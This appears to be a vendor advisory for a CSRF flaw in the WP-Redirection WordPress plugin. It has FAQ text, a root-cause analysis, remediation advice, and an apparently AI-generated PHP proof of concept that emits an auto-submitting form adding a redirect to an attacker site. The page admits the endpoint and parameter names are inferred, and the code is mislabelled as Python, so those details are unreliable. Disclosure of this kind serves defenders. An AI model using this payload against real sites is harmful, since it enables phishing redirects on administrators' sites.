What is CVE-2026-7562?

CVE-2026-7562 is a Cross-Site Request Forgery (CSRF) vulnerability found in the WP-Redirection plugin for WordPress, affecting all versions up to and including 1.0.3. It allows unauthenticated attackers to trick logged-in administrators into performing unauthorized actions, such as adding or modifying URL redirection rules.

How does this vulnerability work?

The vulnerability arises from the absence of nonce verification in the plugin’s admin settings form. Attackers can create a crafted link that, when clicked by an administrator, submits a POST request to the plugin’s management page, allowing unauthorized changes to redirection rules without the administrator’s consent.

Who is affected by this vulnerability?

Any WordPress site using the WP-Redirection plugin version 1.0.3 or earlier is vulnerable. Administrators of such sites should verify their plugin version and check for any unauthorized changes to redirection rules.

How can I check if my site is affected?

To check if your site is affected, navigate to the ‘Plugins’ section in your WordPress admin dashboard. Look for the WP-Redirection plugin and verify its version. If it is 1.0.3 or earlier, your site is vulnerable.

What should I do to fix this vulnerability?

Currently, there is no patched version available for the WP-Redirection plugin. Users should disable the plugin until a fix is released. Alternatively, you can implement a virtual patch by adding nonce verification to the affected functions in the plugin’s code.

What does the risk level of 'Medium' mean?

The ‘Medium’ risk level, indicated by a CVSS score of 4.3, suggests that while the vulnerability requires user interaction for exploitation, it can still lead to significant issues such as unauthorized changes to redirection rules. Administrators should take this vulnerability seriously and act promptly.

What are the practical implications of this vulnerability?

Exploitation of this vulnerability could allow attackers to create malicious redirects, potentially leading to phishing attacks or broken site functionality. While it does not allow for data theft or privilege escalation, it can compromise the integrity of the site’s redirection rules.

How does the proof of concept demonstrate the issue?

The proof of concept illustrates how an attacker can craft a malicious form that submits a POST request to the WP-Redirection management page. By tricking an authenticated administrator into interacting with this form, the attacker can execute unauthorized actions, showcasing the CSRF vulnerability.

What is nonce verification and why is it important?

Nonce verification is a security measure in WordPress that helps prevent CSRF attacks by ensuring that requests are valid and originate from the current user session. It ties actions to the user’s session, making it difficult for attackers to perform unauthorized actions on behalf of users.

What are the recommended practices while waiting for a fix?

While waiting for a fix, it is advisable to disable the WP-Redirection plugin to prevent exploitation. Additionally, consider implementing security measures such as monitoring user activity and reviewing redirection rules regularly for any unauthorized changes.

Where can I find updates on this vulnerability?

Updates regarding CVE-2026-7562 and any potential patches can typically be found on the official WordPress plugin repository, security advisory websites, or through security-focused communities. Regularly check these sources to stay informed about the status of the vulnerability.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 11, 2026

CVE-2026-7562: WP-Redirection <= 1.0.3 – Cross-Site Request Forgery to Settings Update (wp-redirection)

CVE ID CVE-2026-7562

Plugin wp-redirection

Severity Medium (CVSS 4.3)

CWE 352

Vulnerable Version 1.0.3

Patched Version —

Disclosed May 10, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-7562 (metadata-based): This vulnerability is a Cross-Site Request Forgery (CSRF) in the WP-Redirection plugin for WordPress, affecting all versions up to and including 1.0.3. The plugin provides URL redirection management for WordPress sites. The CVSS score is 4.3 (medium severity), with a vector that requires user interaction. No patched version exists.

The root cause is the absence of nonce validation in the plugin’s admin settings form and the displayWPRedirectionManagementPage() function. In WordPress, nonce fields prevent CSRF by tying requests to the current user session. The CWE-352 classification indicates the function processes POST requests for add, edit, or delete operations on redirection rules without calling check_admin_referer() or wp_verify_nonce(). Atomic Edge analysis infers this from the CVE description and CWE classification; no code diff is available to confirm the specific function name or the exact nonce omission.

Exploitation requires tricking an authenticated WordPress administrator into clicking a malicious link or visiting a crafted page. The attacker constructs a CSRF payload that submits a POST request to the plugin’s admin management page. The likely endpoint is /wp-admin/admin.php?page=wp-redirection (or similar), with POST parameters such as ‘action’ set to ‘add’, ‘edit’, or ‘delete’, and parameters for the redirection rule (e.g., ‘redirect_from’, ‘redirect_to’). The attacker hosts the crafted form on an external site or embeds it in a link that auto-submits the form. Since no nonce validates the request, the administrator’s browser submits the malicious request with their valid session cookies, performing unauthorized operations.

Remediation requires adding nonce verification to the affected function. The plugin must generate a nonce using wp_create_nonce() and include it as a hidden field in the settings form. The displayWPRedirectionManagementPage() function should call check_admin_referer() or wp_verify_nonce() before processing any POST request to add, edit, or delete redirection rules. Without a patched version available, users should disable the plugin until a fix is released or implement a virtual patch.

Impact is limited to unauthorized modification of redirection rules. An attacker can create redirects to malicious sites, modify existing redirects, or delete legitimate rules. This could lead to phishing attacks, where users are redirected to attacker-controlled domains, or broken site functionality. No data theft or privilege escalation is possible, as the vulnerability only allows state changes to the redirection rules table. The CVSS impact is limited to integrity (low), with no confidentiality impact.

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-7562 - WP-Redirection <= 1.0.3 - Cross-Site Request Forgery to Settings Update

<?php
/**
 * Python implementation example:
 * This PoC demonstrates a CSRF attack that adds a malicious redirect rule.
 * It assumes the admin is logged in and clicks a crafted link or visits a page.
 *
 * Usage:
 *   $target_url = 'http://example.com/wp-admin/admin.php?page=wp-redirection';
 *   $attacker submits auto-submitting form to add a redirect.
 */

$target_url = 'http://example.com/wp-admin/admin.php?page=wp-redirection'; // Change to target WordPress admin URL

// Craft HTML form with auto-submit JavaScript
$payload = '
<!DOCTYPE html>
<html>
<body>
<form action="' . htmlspecialchars($target_url, ENT_QUOTES) . '" method="POST" id="csrf_form">
  <input type="hidden" name="action" value="add_rule">
  <input type="hidden" name="redirect_from" value="/old-path">
  <input type="hidden" name="redirect_to" value="https://attacker-controlled-site.com/">
  <input type="hidden" name="redirect_type" value="301">
  <input type="submit" value="Submit">
</form>
<script>
  document.getElementById("csrf_form").submit();
</script>
</body>
</html>
';

echo $payload;
?>

Frequently Asked Questions

What is CVE-2026-7562?
Understanding the vulnerability
CVE-2026-7562 is a Cross-Site Request Forgery (CSRF) vulnerability found in the WP-Redirection plugin for WordPress, affecting all versions up to and including 1.0.3. It allows unauthenticated attackers to trick logged-in administrators into performing unauthorized actions, such as adding or modifying URL redirection rules.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability arises from the absence of nonce verification in the plugin’s admin settings form. Attackers can create a crafted link that, when clicked by an administrator, submits a POST request to the plugin’s management page, allowing unauthorized changes to redirection rules without the administrator’s consent.
Who is affected by this vulnerability?
Identifying impacted users
Any WordPress site using the WP-Redirection plugin version 1.0.3 or earlier is vulnerable. Administrators of such sites should verify their plugin version and check for any unauthorized changes to redirection rules.
How can I check if my site is affected?
Verifying plugin version
To check if your site is affected, navigate to the ‘Plugins’ section in your WordPress admin dashboard. Look for the WP-Redirection plugin and verify its version. If it is 1.0.3 or earlier, your site is vulnerable.
What should I do to fix this vulnerability?
Remediation steps
Currently, there is no patched version available for the WP-Redirection plugin. Users should disable the plugin until a fix is released. Alternatively, you can implement a virtual patch by adding nonce verification to the affected functions in the plugin’s code.
What does the risk level of 'Medium' mean?
Understanding severity ratings
The ‘Medium’ risk level, indicated by a CVSS score of 4.3, suggests that while the vulnerability requires user interaction for exploitation, it can still lead to significant issues such as unauthorized changes to redirection rules. Administrators should take this vulnerability seriously and act promptly.
What are the practical implications of this vulnerability?
Potential impact on websites
Exploitation of this vulnerability could allow attackers to create malicious redirects, potentially leading to phishing attacks or broken site functionality. While it does not allow for data theft or privilege escalation, it can compromise the integrity of the site’s redirection rules.
How does the proof of concept demonstrate the issue?
Understanding the PoC
The proof of concept illustrates how an attacker can craft a malicious form that submits a POST request to the WP-Redirection management page. By tricking an authenticated administrator into interacting with this form, the attacker can execute unauthorized actions, showcasing the CSRF vulnerability.
What is nonce verification and why is it important?
Role of nonces in security
Nonce verification is a security measure in WordPress that helps prevent CSRF attacks by ensuring that requests are valid and originate from the current user session. It ties actions to the user’s session, making it difficult for attackers to perform unauthorized actions on behalf of users.
What are the recommended practices while waiting for a fix?
Mitigation strategies
While waiting for a fix, it is advisable to disable the WP-Redirection plugin to prevent exploitation. Additionally, consider implementing security measures such as monitoring user activity and reviewing redirection rules regularly for any unauthorized changes.
Where can I find updates on this vulnerability?
Staying informed
Updates regarding CVE-2026-7562 and any potential patches can typically be found on the official WordPress plugin repository, security advisory websites, or through security-focused communities. Regularly check these sources to stay informed about the status of the vulnerability.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations